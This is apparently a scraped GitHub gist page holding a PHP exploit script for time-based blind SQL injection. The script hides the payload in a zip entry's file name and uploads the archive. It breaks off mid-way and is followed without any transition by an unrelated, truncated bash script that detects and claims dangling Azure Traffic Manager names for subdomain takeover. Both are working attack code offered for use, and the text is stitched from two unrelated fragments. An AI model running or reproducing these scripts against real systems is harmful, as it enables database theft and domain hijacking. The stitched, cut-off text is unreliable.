Skip to content

Instantly share code, notes, and snippets.

@mcipekci
mcipekci / exploit.php
Created March 21, 2023 13:35
Exploiting SQL injection via unzipped file contents
<?php
// Prepare File
$file = tempnam("/tmp", "zip");
$zip = new ZipArchive();
$zip->open($file, ZipArchive::OVERWRITE);
// Add file name with SQLi payload
$zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", "");
// Close and send to the server
$zip->close();
$cf = new CURLFile($file);
#!/bin/bash
echo "--------------------------------------"
echo "Trying to takeover $1 on Azure TrafficManager"
domainName=$1.trafficmanager.net
echo "Checking DNS state for $domainName"
dnsState=$(dig $domainName @tm2.msft.net | grep NXDOMAIN)
if [[ ! -z $dnsState ]]; then
echo "$1 is pointing NXDOMAIN, trying to create it..."
NEW_UUID=$(echo $1 | sed 's/\.//g')
result=$(azure network traffic-manager profile create --name $NEW_UUID -d $domainName -m Performance -p http -p https -r "/" --json 2>/dev/null | jq .profile.domainName | sed 's/\"//g')